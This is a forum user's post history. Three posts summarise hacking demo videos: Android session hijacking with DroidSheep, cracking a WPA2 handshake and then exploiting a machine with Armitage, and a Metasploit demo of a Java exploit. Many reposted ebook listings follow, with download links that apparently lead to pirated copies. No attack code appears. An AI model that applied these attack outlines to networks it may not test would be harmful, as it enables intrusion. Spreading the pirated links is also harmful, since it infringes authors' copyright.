-
Posts
18725 -
Joined
-
Last visited
-
Days Won
706
Everything posted by Nytro
-
[h=4]Hijack From Android Phone[/h] Description: I installed DroidSheep for V14, it is an open source software. Please visit this website and download the APK package. (http://droidsheep.de/) enjoy~ Sursa: Hijack From Android Phone Exemplu de capturare a unei sesiuni HTTP folosind DroidSheep pe un telefon cu Android.
-
[h=4]Capturing A Wpa2 4-Way Handshake, Cracking It, And Then Using Armitage To Exploit A Local Machine[/h] Description: Please watch in 1080p!!! Using Oclhashcat-plus (oclHashcat-plus - advanced password recovery/) to speed up the WPA2 cracking process. For more information on how to use oclhc+ to crack WPA/WPA2 handshakes visit this link (cracking_wpawpa2 [hashcat wiki]) Sursa: Capturing A Wpa2 4-Way Handshake, Cracking It, And Then Using Armitage To Exploit A Local Machine Pe scurt: - se captureaza handshake-ul de la conexiunea WPA2 cu aircrack-ng - se sparge cu oclHash - se scaneaza reteaua locala - se foloseste un exploit pentru obtinerea accesului - smb-netapi - fun
-
[h=4]Cross-Platform Java Exploit (Cve-2011-3544) Demonstration[/h] Description: This video uses Armitage and Metasploit to demonstrate a new cross-platform Java exploit. This exploit uses a loophole in the Java API to execute a payload outside of Java's security sandbox without requiring a user to approve some action. This works in Firefox, Internet Explorer, and Safari on Windows, MacOS X, and presumably Linux. Java 1.6.0u27, Java 1.7.0, and older versions are vulnerable. Sursa: Cross-Platform Java Exploit (Cve-2011-3544) Demonstration Exemplu de folosire al exploitului Java Rhino cu Armitage. Simplu si extrem de eficient.
-
[h=2]Shell Scripting: Expert Recipes for Linux, Bash and more[/h] [h=3]Book Description[/h] A compendium of shell scripting recipes that can immediately be used, adjusted, and applied The shell is the primary way of communicating with the Unix and Linux systems, providing a direct way to program by automating simple-to-intermediate tasks. With this book, Linux expert Steve Parker shares a collection of shell scripting recipes that can be used as is or easily modified for a variety of environments or situations. The book covers shell programming, with a focus on Linux and the Bash shell; it provides credible, real-world relevance, as well as providing the flexible tools to get started immediately. Shares a collection of helpful shell scripting recipes that can immediately be used for various of real-world challenges Features recipes for system tools, shell features, and systems administration Provides a host of plug and play recipes for to immediately apply and easily modify so the wheel doesn’t have to be reinvented with each challenge faced Come out of your shell and dive into this collection of tried and tested shell scripting recipes that you can start using right away! From the Back Cover Tried-and-true recipes that can be immediately applied or easily adjusted to meet your needs The shell is the primary way of communicating with Unix and Linux systems, providing a direct way to program by automating simple to intermediate tasks. In this invaluable resource, Unix, Linux, and shell scripting expert Steve Parker shares a collection of shell scripting recipes that can be used as provided or easily modified for a variety of environments and situations. The book begins with coverage of theory and principles, replete with insightful examples of each element discussed. You then move on to an in-depth discussion of shell programming, covering all Unix flavors but with a focus on Linux and the Bash shell. All the while, you explore credible, real-world recipes and the tools necessary to get started immediately. Shell Scripting: Shares a compendium of helpful shell scripting recipes that can be used to address a variety of real-world challenges Includes recipes using file and text control as well as general systems administration tasks Provides a host of plug-and-play recipes ready for you to immediately apply and easily modify Examines variables, if/then conditionals, loops, functions, pipes, redirects, and more [h=3]Book Details[/h] Paperback: 600 pages Publisher: Wrox (August 2011) Language: English ISBN-10: 1118024486 ISBN-13: 978-1118024485 File Size: 33.2 MiB [h=3]E-Book[/h] [FilePost] Wrox.Shell.Scripting.Aug.2011.rar [FileJungle] Wrox.Shell.Scripting.Aug.2011.rar [h=3]Paper Book[/h] [Amazon] Shell Scripting: Expert Recipes for Linux, Bash and more Sursa: Shell Scripting: Expert Recipes for Linux, Bash and more | Wow! eBook - Blog
-
[h=2]Objective-C Fundamentals[/h] [h=3]Book Description[/h] Objective-C Fundamentals guides you gradually from your first line of Objective-C code through the process of building native apps for the iPhone. Starting with chapter one, you’ll dive into iPhone development by building a simple game that you can run immediately. You’ll use tools like Xcode 4 and the debugger that will help you become a more efficient programmer. By working through numerous easy-to-follow examples, you’ll learn practical techniques and patterns you can use to create solid and stable apps. And you’ll find out how to avoid the most common pitfalls. No iOS or mobile experience is required to benefit from this book but familiarity with programming in general is helpful. What’s Inside Objective-C from the ground up Developing with Xcode 4 Examples that work unmodified on iPhone Table of Contents PART 1 GETTING STARTED WITH OBJECTIVE-C Building your first iOS application Data types, variables, and constants An introduction to objects Storing data in collections PART 2 BUILDING YOUR OWN OBJECTS Creating classes Extending classes Protocols Dynamic typing and runtime type information Memory management PART 3 MAKING MAXIMUM USE OF FRAMEWORK FUNCTIONALITY Error and exception handling Key-Value Coding and NSPredicate Reading and writing application data Blocks and Grand Central Dispatch Debugging techniques [h=3]Book Details[/h] Paperback: 368 pages Publisher: Manning Publications (September 2011) Language: English ISBN-10: 1935182536 ISBN-13: 978-1935182535 File Size: 14.5 MiB [h=3]E-Book[/h] [FilePost] Manning.Objective-C.Fundamentals.Sep.2011.rar [FileJungle] Manning.Objective-C.Fundamentals.Sep.2011.rar [h=3]Paper Book[/h] [Amazon] Objective-C Fundamentals Sursa: Objective-C Fundamentals | Wow! eBook - Blog
-
[h=2]Professional NoSQL[/h] [h=3]Book Description[/h] A hands-on guide to leveraging NoSQL databases NoSQL databases are an efficient and powerful tool for storing and manipulating vast quantities of data. Most NoSQL databases scale well as data grows. In addition, they are often malleable and flexible enough to accommodate semi-structured and sparse data sets. This comprehensive hands-on guide presents fundamental concepts and practical solutions for getting you ready to use NoSQL databases. Expert author Shashank Tiwari begins with a helpful introduction on the subject of NoSQL, explains its characteristics and typical uses, and looks at where it fits in the application stack. Unique insights help you choose which NoSQL solutions are best for solving your specific data storage needs. Professional NoSQL: Demystifies the concepts that relate to NoSQL databases, including column-family oriented stores, key/value databases, and document databases. Delves into installing and configuring a number of NoSQL products and the Hadoop family of products. Explains ways of storing, accessing, and querying data in NoSQL databases through examples that use MongoDB, HBase, Cassandra, Redis, CouchDB, Google App Engine Datastore and more. Looks at architecture and internals. Provides guidelines for optimal usage, performance tuning, and scalable configurations. Presents a number of tools and utilities relating to NoSQL, distributed platforms, and scalable processing, including Hive, Pig, RRDtool, Nagios, and more. [h=3]Book Details[/h] Paperback: 384 pages Publisher: Wrox (August 2011) Language: English ISBN-10: 047094224X ISBN-13: 978-0470942246 File Size: 32.3 MiB [h=3]E-Book[/h] [FilePost] Wrox.Professional.NoSQL.Aug.2011.rar [FileJungle] Wrox.Professional.NoSQL.Aug.2011.rar [h=3]Paper Book[/h] [Amazon] Professional NoSQL Sursa: Professional NoSQL | Wow! eBook - Blog
-
[h=2]Microsoft Visual C# 2010: An Introduction to Object-Oriented Programming, 4th Edition[/h] [h=3]Book Description[/h] Using engaging examples and a clear, straightforward approach, MICROSOFT VISUAL C# 2010: AN INTRODUCTION TO OBJECT-ORIENTED PROGRAMMING, FOURTH EDITION guides beginning programmers through developing programs in the C# language. The book provides readers with a strong background knowledge of structured programming, method calling, and parameter passing, all of which are important concepts easily transferable to other programming languages. The Fourth Edition has been written and tested using the latest version of C#, Visual C# 2010, and now offers supplementary video lessons, expanded coverage of methods, and the option to study GUI applications earlier in the text. Table of Contents Preface CHAPTER 1 A First Program Using C# CHAPTER 2 Using Data CHAPTER 3 Using GUI Objects and the Visual Studio IDE CHAPTER 4 Making Decisions CHAPTER 5 Looping CHAPTER 6 Using Arrays CHAPTER 7 Using Methods CHAPTER 8 Advanced Method Concepts CHAPTER 9 Using Classes and Objects CHAPTER 10 Introduction to Inheritance CHAPTER 11 Exception Handling CHAPTER 12 Using Controls CHAPTER 13 Handling Events CHAPTER 14 Files and Streams CHAPTER 15 Using LINQ to Access Data in C# Programs APPENDIX A Operator Precedence And Associativity APPENDIX B Understanding Numbering Systems and Computer Codes APPENDIX C Using The IDE Editor Glossary Index [h=3]Book Details[/h] Paperback: 848 pages Publisher: Course Technology; 4th Edition (August 2010) Language: English ISBN-10: 0538479515 ISBN-13: 978-0538479516 File Size: 11.3 MiB [h=3]E-Book[/h] [FilePost] Course.Microsoft.Visual.CSharp.2010.Aug.2010.rar [FileJungle] Course.Microsoft.Visual.CSharp.2010.Aug.2010.rar [h=3]Paper Book[/h] [Amazon] Microsoft Visual C# 2010: An Introduction to Object-Oriented Programming, 4th Edition Sursa: Microsoft Visual C# 2010: An Introduction to Object-Oriented Programming, 4th Edition | Wow! eBook - Blog
-
[h=2]Start Here! Fundamentals of Microsoft .NET Programming[/h] [h=3]Book Description[/h] Grasp the basic concepts that drive all Microsoft® .NET-based languages—and prepare yourself to learn .NET programming. If you have absolutely no previous experience, no problem—simply start here! This ebook provides the foundation for all other .NET programming language books in the Start Here! series. You’ll explore programming concepts and techniques with clear explanations, easy-to-follow examples, and exercises. It’s the perfect reference for understanding how computer programs work. Delve into object-oriented concepts such as properties, methods, and events Discover what multiprocessing is—and how it’s changing computing Examine how programs store data in files, object stores, and databases Explore controls, such as labels, text boxes, menus, and scroll bars Learn how programming environments help you design and run programs Get an extensive glossary of key programming terms Table of Contents Chapter 1 Computer Hardware Chapter 2 Multiprocessing Chapter 3 Programming Environments Chapter 4 Windows Program Components Chapter 5 Controls Chapter 6 Variables Chapter 7 Control Statements Chapter 8 Operators Chapter 9 Routines Chapter 10 Object-Oriented Programming Chapter 11 Development Techniques Chapter 12 Globalization Chapter 13 Data Storage Chapter 14 .NET Libraries [h=3]Book Details[/h] Paperback: 264 pages Publisher: Microsoft Press (October 2011) Language: English ISBN-10: 0735661685 ISBN-13: 978-0735661684 File Size: 9.6 MiB [h=3]E-Book[/h] [FilePost] Microsoft.Press.Start.Here.Fundamentals.of.Microsoft.NET.Programming.Oct.2011.rar [FileJungle] Microsoft.Press.Start.Here.Fundamentals.of.Microsoft.NET.Programming.Oct.2011.rar [h=3]Paper Book[/h] [Amazon] Start Here! Fundamentals of Microsoft .NET Programming Sursa: Start Here! Fundamentals of Microsoft .NET Programming | Wow! eBook - Blog
-
[h=2]Start Here! Learn Microsoft Visual C# 2010[/h] [h=3]Book Description[/h] Ready to learn programming? Start Here!™ Learn the fundamentals of modern programming with Visual C# 2010—and begin building your first apps for the desktop and web. If you have absolutely no previous experience, no problem—simply start here! This book introduces must-know concepts and techniques through easy-to-follow explanations, examples, and exercises. Here’s where you start learning Visual C# Learn how an application performs tasks by tracing its code Query and manipulate application data with LINQ Access web services with REST and SOAP Build simple apps with Windows® Presentation Foundation Explore rich Internet apps with Microsoft Silverlight® Find and fix errors by debugging your applications Put it all together by creating your first programs Table of Contents Chapter 1 Getting to Know C# Chapter 2 Developing a Web Project Chapter 3 Basic Data Manipulation Techniques Chapter 4 Using Collections to Store Data Chapter 5 Working with XML Chapter 6 Accessing a Web Service Chapter 7 Using the Windows Presentation Foundation Chapter 8 Working with Libraries Chapter 9 Creating Utility Applications Chapter 10 Using LINQ in Web Applications Chapter 11 Working with Silverlight Applications Chapter 12 Debugging Applications [h=3]Book Details[/h] Paperback: 394 pages Publisher: Microsoft Press (October 2011) Language: English ISBN-10: 0735657726 ISBN-13: 978-0735657724 File Size: 19.2 MiB [h=3]E-Book[/h] [FilePost] Microsoft.Press.Start.Here.Learn.Microsoft.Visual.CSharp.2010.Oct.2011.rar [FileJungle] Microsoft.Press.Start.Here.Learn.Microsoft.Visual.CSharp.2010.Oct.2011.rar [h=3]Paper Book[/h] [Amazon] Start Here! Learn Microsoft Visual C# 2010 Sursa: Start Here! Learn Microsoft Visual C# 2010 | Wow! eBook - Blog
-
[h=2]JavaScript & jQuery: The Missing Manual, 2nd Edition[/h] [h=3]Book Description[/h] JavaScript lets you supercharge your HTML with animation, interactivity, and visual effects—but many web designers find the language hard to learn. This jargon-free guide covers JavaScript basics and shows you how to save time and effort with the jQuery library of prewritten JavaScript code. You’ll soon be building web pages that feel and act like desktop programs, without having to do much programming. The important stuff you need to know: Make your pages interactive. Create JavaScript events that react to visitor actions. Use animations and effects. Build drop-down navigation menus, pop-ups, automated slideshows, and more. Improve your user interface. Learn how the pros make websites fun and easy to use. Collect data with web forms. Create easy-to-use forms that ensure more accurate visitor responses. Add a dash of Ajax. Enable your web pages to communicate with a web server without a page reload. Practice with living examples. Get step-by-step tutorials for web projects you can build yourself. Table of Contents Chapter 1 Writing Your First JavaScript Program Chapter 2 The Grammar of JavaScript Chapter 3 Adding Logic and Control to Your Programs Chapter 4 Introducing jQuery Chapter 5 Action/Reaction: Making Pages Come Alive with Events Chapter 6 Animations and Effects Chapter 7 Improving Your Images Chapter 8 Improving Navigation Chapter 9 Enhancing Web Forms Chapter 10 Expanding Your Interface Chapter 11 Introducing Ajax Chapter 12 Flickr and Google Maps Chapter 13 Getting the Most from jQuery Chapter 14 Going Further with JavaScript Chapter 15 Troubleshooting and Debugging [h=3]Book Details[/h] Paperback: 536 pages Publisher: O’Reilly Media / Pogue Press; 2nd Edition (October 2011) Language: English ISBN-10: 1449399029 ISBN-13: 978-1449399023 File Size: 21.5 MiB [h=3]E-Book[/h] [FilePost] Oreilly.JavaScript.and.jQuery.The.Missing.Manual.2nd.Edition.Oct.2011.rar [FileJungle] Oreilly.JavaScript.and.jQuery.The.Missing.Manual.2nd.Edition.Oct.2011.rar [h=3]Paper Book[/h] [Amazon] JavaScript & jQuery: The Missing Manual, 2nd Edition Sursa: JavaScript & jQuery: The Missing Manual, 2nd Edition | Wow! eBook - Blog
-
[h=2]Professional C++, 2nd Edition[/h] [h=3]Book Description[/h] Essential reading for experienced developers who are determined to master the latest release of C++ Although C++ is often the language of choice from game programming to major commercial software applications, it is also one of the most difficult to master. With this no-nonsense book, you will learn to conquer the latest release of C++. The author deciphers little-known features of C++, shares detailed code examples that you can then plug into your own code, and reveals the significant changes to C++ that accompany the latest release. You’ll discover how to design and build applications that solve real-world problems and then implement the solution using the full capabilities of the language. Appeals to experienced developers who are looking for a higher level of learning Drills down the extensive changes to the latest C++ standard, C++11, including enhancements made to run-time performance, standard library, language usability, and core language Zeroes in on explaining the more poorly understood elements of the C++ feature set and addresses common pitfalls to avoid Includes case studies that feature extensive, working code that has been tested on Windows and Linux platforms Intertwines text with useful tips, tricks, and workarounds Packed with best practices for programming, testing, and debugging applications, this book is vital for taking your C++ skills to the next level. From the Back Cover Master the latest release of the C++ language: C++11 C++ is often the language of choice for writing fast, powerful, and enterprise-class object-oriented programs, be it games or major commercial software applications. However, there’s no two ways around it: C++ can be difficult to master. With this no-nonsense book, you will learn to conquer the latest version of the C++ language: C++11. The authors share real-world examples, decipher little-known features of C++, and reveal the significant changes to C++ that accompany the latest release. Ultimately, you’ll discover programming methodologies, reusable design patterns, and good programming style that will increase the quality of your code and improve your programming efficiency. Professional C++, 2nd Edition: Offers detailed code examples that you can plug into your own code Takes you on a technical tour of C++ and the STL, and explores the unusual and quirky aspects of this language Exposes best practices for using the more advanced features of C++, including operator overloading, managing memory, writing templates, and writing multithreaded code Discusses techniques for writing cross-language and cross-platform code Teaches you the importance of code reuse as well as the nuances of writing readable C++ code [h=3]Book Details[/h] Paperback: 1104 pages Publisher: Wrox; 2nd Edition (October 2011) Language: English ISBN-10: 0470932449 ISBN-13: 978-0470932445 File Size: 5.8 MiB [h=3]E-Book[/h] [FilePost] Wrox.Professional.CPP.2nd.Edition.Oct.2011.epub [FileJungle] Wrox.Professional.CPP.2nd.Edition.Oct.2011.epub [h=3]Paper Book[/h] [Amazon] Professional C++, 2nd Edition Sursa: Professional C++, 2nd Edition | Wow! eBook - Blog
-
[h=2]Optimizing Windows 7 Pocket Consultant[/h] [h=3]Book Description[/h] Portable and precise, this pocket-sized guide delivers ready answers for optimizing the performance of your Windows 7-based PC. Zero in on core tuning, customization, and troubleshooting tasks using quick-reference tables, instructions, and lists. Topics include system boot and startup, software and hardware, search and indexing, system health, and personalizing the interface. You’ll get the focused information you need to solve problems and get the job done. Table of Contents Chapter 1 Customizing the Windows 7 Interface Chapter 2 Personalizing the Appearance of Windows 7 Chapter 3 Customizing Boot, Startup, and Power Options Chapter 4 Organizing, Searching, and Indexing Chapter 5 Optimizing Your Computer’s Software Chapter 6 Tracking System Performance and Health Chapter 7 Analyzing and Logging Performance Chapter 8 Optimizing Performance Tips and Techniques Appendix Firmware Interface Options About the Author William R. Stanek has more than 20 years’ experience in systems management and advanced programming. He is an award-winning author who’s written more than 100 books, including the popular Windows Server® 2008 Inside Out. He is Series Editor for the Pocket Consultant line of books from Microsoft Press®. [h=3]Book Details[/h] Paperback: 208 pages Publisher: Microsoft Press (September 2011) Language: English ISBN-10: 0735661650 ISBN-13: 978-0735661653 File Size: 11.5 MiB [h=3]E-Book[/h] [FilePost] Microsoft.Press.Optimizing.Windows.7.Pocket.Consultant.Sep.2011.rar [FileJungle] Microsoft.Press.Optimizing.Windows.7.Pocket.Consultant.Sep.2011.rar [h=3]Paper Book[/h] [Amazon] Optimizing Windows 7 Pocket Consultant Sursa: Optimizing Windows 7 Pocket Consultant | Wow! eBook - Blog
-
[h=2]Routing TCP/IP, Volume II[/h] [h=3]Book Description[/h] A detailed examination of exterior routing protocols and advanced IP routing issues Routing TCP/IP, Volume II, enables you to: Master the operational components, configuration, and troubleshooting of BGP-4-the de facto interdomain routing protocol Understand the operation, configuration, and troubleshooting of NAT Learn how to deploy, configure, and troubleshoot IP multicast routing through an array of case studies and exercises Familiarize yourself with the design goals and current state of IPv6, the new generation of the IP protocol Implement router management through a diverse range of expert-tested methods Test and validate your knowledge with practical, comprehensive review questions, configuration exercises, and troubleshooting exercises Further your CCIE preparation while mastering advanced TCP/IP concepts The complexities of exterior gateway protocols, including TCP connections, message states, path attributes, interior routing protocol interoperation, and setting up neighbor connections, require a comprehensive understanding of router operations in order to manage network growth. Routing TCP/IP, Volume II, provides you with the expertise necessary to understand and implement Border Gateway Protocol Version 4 (BGP-4), multicast routing, Network Address Translation (NAT), IPv6, and effective router management techniques. Jeff Doyle’s practical approach, easy-to-read format, and comprehensive topic coverage make this book an instant classic and a must-have addition to any network professional’s library. Routing TCP/IP, Volume II, expands upon the central theme of Volume I: scalability and management of network growth. Volume II moves beyond the interior gateway protocols covered in Volume I to examine both inter-autonomous system routing and more exotic routing issues such as multicasting and IPv6. This second volume follows the same informational structure used effectively in Volume I: discussing the topic fundamentals, following up with a series of configuration examples designed to show the concept in a real-world environment, and relying on tested troubleshooting measures to resolve any problems that might arise. This book helps you accomplish more than earning the highly valued CCIE number after your name; it also helps you develop the knowledge and skills that are essential to perform your job at an expert level. Whether you are pursuing CCIE certification, need to review for your CCIE recertification exam, or are just looking for expert-level advice on advanced routing issues, Routing TCP/IP, Volume II, helps you understand foundation concepts and apply best practice techniques for effective network growth and management. [h=3]Book Details[/h] Hardcover: 976 pages Publisher: Cisco Press (April 2001) Language: English ISBN-10: 1578700892 ISBN-13: 978-1578700899 File Size: 16.0 MiB [h=3]E-Book[/h] [FilePost] Cisco.Press.Routing.TCP.IP.Vol.II.Apr.2001.rar [FileJungle] Cisco.Press.Routing.TCP.IP.Vol.II.Apr.2001.rar [h=3]Paper Book[/h] [Amazon] Routing TCP/IP, Volume II Sursa: Routing TCP/IP, Volume II | Wow! eBook - Blog
-
[h=2]Network Security Technologies and Solutions[/h] [h=3]Book Description[/h] Network Security Technologies and Solutions is a comprehensive reference to the most cutting-edge security products and methodologies available to networking professionals today. This book helps you understand and implement current, state-of-the-art network security technologies to ensure secure communications throughout the network infrastructure. With an easy-to-follow approach, this book serves as a central repository of security knowledge to help you implement end-to-end security solutions and provides a single source of knowledge covering the entire range of the Cisco network security portfolio. The book is divided into five parts mapping to Cisco security technologies and solutions: perimeter security, identity security and access management, data privacy, security monitoring, and security management. Together, all these elements enable dynamic links between customer security policy, user or host identity, and network infrastructures. With this definitive reference, you can gain a greater understanding of the solutions available and learn how to build integrated, secure networks in today’s modern, heterogeneous networking environment. This book is an excellent resource for those seeking a comprehensive reference on mature and emerging security tactics and is also a great study guide for the CCIE Security exam. “Yusuf’s extensive experience as a mentor and advisor in the security technology field has honed his ability to translate highly technical information into a straight-forward, easy-to-understand format. If you’re looking for a truly comprehensive guide to network security, this is the one! ” –Steve Gordon, Vice President, Technical Services, Cisco Yusuf Bhaiji, CCIE No. 9305 (R&S and Security), has been with Cisco for seven years and is currently the program manager for Cisco CCIE Security certification. He is also the CCIE Proctor in the Cisco Dubai Lab. Prior to this, he was technical lead for the Sydney TAC Security and VPN team at Cisco. Filter traffic with access lists and implement security features on switches Configure Cisco IOS router firewall features and deploy ASA and PIX Firewall appliances Understand attack vectors and apply Layer 2 and Layer 3 mitigation techniques Secure management access with AAA Secure access control using multifactor authentication technology Implement identity-based network access control Apply the latest wireless LAN security solutions Enforce security policy compliance with Cisco NAC Learn the basics of cryptography and implement IPsec VPNs, DMVPN, GET VPN, SSL VPN, and MPLS VPN technologies Monitor network activity and security incident response with network and host intrusion prevention, anomaly detection, and security monitoring and correlation Deploy security management solutions such as Cisco Security Manager, SDM, ADSM, PDM, and IDM Learn about regulatory compliance issues such as GLBA, HIPPA, and SOX This book is part of the Cisco CCIE Professional Development Series from Cisco Press, which offers expert-level instruction on network design, deployment, and support methodologies to help networking professionals manage complex networks and prepare for CCIE exams. [h=3]Book Details[/h] Hardcover: 840 pages Publisher: Cisco Press (March 2008) Language: English ISBN-10: 1587052466 ISBN-13: 978-1587052460 File Size: 19.1 MiB [h=3]E-Book[/h] [FilePost] Cisco.Press.Network.Security.Technologies.and.Solutions.Mar.2008.rar [FileJungle] Cisco.Press.Network.Security.Technologies.and.Solutions.Mar.2008.rar [h=3]Paper Book[/h] [Amazon] Network Security Technologies and Solutions Sursa: Network Security Technologies and Solutions | Wow! eBook - Blog
-
[h=2]Security Administrator Street Smarts, 3rd Edition[/h] [h=3]Book Description[/h] A step-by-step guide to the tasks involved in security administration If you aspire to a career in security administration, one of your greatest challenges will be gaining hands-on experience. This book takes you through the most common security admin tasks step by step, showing you the way around many of the roadblocks you can expect on the job. It offers a variety of scenarios in each phase of the security administrator’s job, giving you the confidence of first-hand experience. In addition, this is an ideal complement to the brand-new, bestselling CompTIA Security+ Study Guide, 5th Edition or the CompTIA Security+ Deluxe Study Guide, 2nd Edition, the latest offerings from Sybex for CompTIA’s Security+ SY0-301 exam. Targets security administrators who confront a wide assortment of challenging tasks and those seeking a career in security administration who are hampered by a lack of actual experience Walks you through a variety of common tasks, demonstrating step by step how to perform them and how to circumvent roadblocks you may encounter Features tasks that are arranged according to four phases of the security administrator’s role: designing a secure network, creating and implementing standard security policies, identifying insecure systems in an existing environment, and training both onsite and remote users Ideal hands-on for those preparing for CompTIA’s Security+ exam (SY0-301) This comprehensive workbook provides the next best thing to intensive on-the-job training for security professionals. From the Back Cover Develop the skills you need in the real world Hit the ground running with the street-smart training you’ll find in this practical guide to security administration. Using a “year in the life” approach, it gives you an inside look at the common responsibilities of security administrators, with key information organized around the actual day-to-day tasks, scenarios, and challenges you’ll face in the field. Updated for CompTIA Security+ Exam SY0-301, this valuable training tool is loaded with hands-on, step-by-step exercises covering all phases of a security administrator’s job, including: Designing a secure network environment Creating and implementing standard security policies and practices Identifying insecure systems in physical and digital environments Providing training to onsite and remote users An invaluable study tool This no-nonsense book also covers common tasks that CompTIA expects all of its Security+ candidates to know how to perform. So whether you’re preparing for certification or seeking practical skills to break into the field, you’ll find the instruction you need, including: Performing an initial risk assessment Hardening all systems—services, ports, OS,and more Encrypting files and securing data storage Creating and managing user accounts Deploying IPSec and securing remote systems Securing Internet activity, networks, and wireless Testing, pen testing, tracking, profiling, and troubleshooting The Street Smarts series is designed to help current or aspiring IT professionals put their certification to work for them. Full of practical, real world scenarios, each book features actual tasks from the field and then offers step-by-step exercises that teach the skills necessary to complete those tasks. And because the exercises are based upon exam objectives from leading technology certifications, each Street Smarts book can be used as a lab manual for certification prep. Step-by-step exercises teach you hands-on skills Real world scenarios put those skills in perspective REVISED FOR THE UPDATED SECURITY+ EXAM (SY0-301) [h=3]Book Details[/h] Paperback: 624 pages Publisher: Sybex; 3rd Edition (June 2011) Language: English ISBN-10: 1118061160 ISBN-13: 978-1118061169 File Size: 56.0 MiB [h=3]E-Book[/h] [FilePost] Sybex.Security.Administrator.Street.Smarts.Jun.2011.epub [FileJungle] Sybex.Security.Administrator.Street.Smarts.Jun.2011.epub [h=3]Paper Book[/h] [Amazon] Security Administrator Street Smarts, 3rd Edition Sursa: Security Administrator Street Smarts, 3rd Edition | Wow! eBook - Blog
-
[h=2]Engineering Information Security[/h] [h=3]Book Description[/h] Information security is the act of protecting information from unauthorized access, use, disclosure, disruption, modification, or destruction. This book discusses why information security is needed and how security problems can have widespread impacts. It covers the complete security lifecycle of products and services, starting with requirements and policy development and progressing through development, deployment, and operations, and concluding with decommissioning. Professionals in the sciences, engineering, and communications fields will turn to this resource to understand the many legal, technical, competitive, criminal and consumer forces and influences that are rapidly changing our information dependent society. From the Back Cover From design to deployment to decommissioning: a systems engineering approach to information security With this book as a guide, readers learn to apply a tested and proven methodology to address the information security concerns of any organization, ensuring that specific classes of information are only accessible to designated users. The methodology is based on systems engineering, a set of concepts that enable the systematic documentation of objectives and set forth the functional and performance capabilities needed to achieve those objectives. Because the book considers the complete life cycle of security systems, it also guides readers through deployment, operations, and eventual decommissioning. Moreover, the book goes well beyond technical requirements, enabling the full account of all aspects of an organization’s needs, including: Day-to-day operations Services and products provided and consumer markets served Overall competitive environment and key competitors Legal and regulatory requirements Vulnerability to criminal activity The book includes a CD which contains more than 200 color figures and diagrams to help illustrate and simplify complex systems and processes. Numerous examples throughout the book show step by step how to put security concepts and mechanisms into practice. The CD also includes a number of useful appendices, including a listing of individual state privacy laws, a sample enterprise security policy document, and a sample request for proposal.By presenting a systems engineering approach to information security, this book enables security practitioners and students of information security to cope with rapid changes in technology in order to consistently provide the level of information security needed to fully protect the interests of an organization, its personnel, and its customers. [h=3]Book Details[/h] Hardcover: 728 pages Publisher: Wiley-IEEE Press (July 2011) Language: English ISBN-10: 0470565128 ISBN-13: 978-0470565124 File Size: 9.2 MiB [h=3]E-Book[/h] [FilePost] Wiley-IEEE.Engineering.Information.Security.Jul.2011.rar [FileJungle] Wiley-IEEE.Engineering.Information.Security.Jul.2011.rar [h=3]Paper Book[/h] [Amazon] Engineering Information Security Sursa: Engineering Information Security | Wow! eBook - Blog
-
[h=2]Expert Oracle and Java Security[/h] [h=3]Book Description[/h] Expert Oracle and Java Security: Programming Secure Oracle Database Applications with Java provides resources that every Java and Oracle database application programmer needs to ensure that they have guarded the security of the data and identities entrusted to them. You’ll learn to consider potential vulnerabilities, and to apply best practices in secure Java and PL/SQL coding. Author David Coffin shows how to develop code to encrypt data in transit and at rest, to accomplish single sign-on with Oracle proxy connections, to generate and distribute two-factor authentication tokens from the Oracle server using pagers, cell phones (SMS), and e-mail, and to securely store and distribute Oracle application passwords. Early chapters lay the foundation for effective security in an Oracle/Java environment. Each of the later chapters brings example code to a point where it may be applied as-is to address application security issues. Templates for applications are also provided to help you bring colleagues up to the same secure application standards. If you are less familiar with either Java or Oracle PL/SQL, you will not be left behind; all the concepts in this book are introduced as to a novice and addressed as to an expert. Helps you protect against data loss, identity theft, SQL injection, and address spoofing Provides techniques for encryption on network and disk, code obfuscation and wrap, database hardening, single sign-on and two-factor Provides what database administrators need to know about secure password distribution, Java secure programming, Java stored procedures, secure application roles in Oracle, logon triggers, database design, various connection pooling schemes, and much more What you’ll learn Guard against data loss, identity theft, SQL Injection, and to address spoofing Protect sensitive data through encryption, both on disk and on the wire Control access to data using secure roles, single sign-on, proxy connections, and two-factor authentication Protect sensitive source ode through randomization, obfuscation, and wrapping Thwart attempts at SQL injection and other common attacks Manage constraints on the visibility of data and the scope of access Who this book is for Expert Oracle and Java Security: Programming Secure Oracle Database Applications with Java is for every Java developer who uses an Oracle database. It is also for every Oracle database administrator or PL/SQL programmer who supports Java client and web applications. Whatever role you play in developing and supporting Java and Oracle applications, you need to address computer, application, data, and identity security. This book offers the tools you’ll need to effectively manage security across all aspects of the applications you support. Table of Contents Introduction Oracle Security Secure Java Development Concepts Java Stored Procedures Adding Public Key Encryption Adding Secret Password Encryption A Working Model for Data Encryption in Transit Implementing Single Sign On Implementing Two-Factor Authentication Application Identification and Authorization Enhancing Our Security Administration of This Security System [h=3]Book Details[/h] Paperback: 472 pages Publisher: Apress (September 2011) Language: English ISBN-10: 1430238313 ISBN-13: 978-1430238317 File Size: 8.8 MiB [h=3]E-Book[/h] [FilePost] Apress.Expert.Oracle.and.Java.Security.Sep.2011.rar [FileJungle] Apress.Expert.Oracle.and.Java.Security.Sep.2011.rar [h=3]Paper Book[/h] [Amazon] Expert Oracle and Java Security Sursa: Expert Oracle and Java Security | Wow! eBook - Blog
-
[h=2]Securing SQL Server[/h] [h=3]Book Description[/h] There is a lot at stake for administrators taking care of servers, since they house sensitive data like credit cards, social security numbers, medical records, and much more. In Securing SQL Server you will learn about the potential attack vectors that can be used to break into your SQL Server database, and how to protect yourself from these attacks. Written by a Microsoft SQL Server MVP and MCM, you will learn how to properly secure your database, from both internal and external threats. Best practices and specific tricks employed by the author will also be revealed. Learn expert techniques to protect your SQL database environment. Author Denny Cherry is a Microsoft MVP and MCM for his expertise in the SQL Server product Learn expert techniques to protect your SQL database environment Discover how to identify what an intruder accessed or damaged Table of Contents Chapter 1: Securing the Network Chapter 2: Database Encryption Chapter 3: SQL Password Security Chapter 4: Securing the Instance Chapter 5: Additional Security for an Internet Facing SQL Server and Application Chapter 6: SQL Injection Attacks Chapter 7: Database Backup Security Chapter 8: Auditing for Security Chapter 9: Server Rights Appendix A: External Audit Checklists [h=3]Book Details[/h] Paperback: 272 pages Publisher: Syngress (February 2011) Language: English ISBN-10: 1597496251 ISBN-13: 978-1597496254 File Size: 4.4 MiB [h=3]E-Book[/h] [FilePost] Syngress.Securing.SQL.Server.Feb.2011.rar [FileJungle] Syngress.Securing.SQL.Server.Feb.2011.rar [h=3]Paper Book[/h] [Amazon] Securing SQL Server Sursa: Securing SQL Server | Wow! eBook - Blog
-
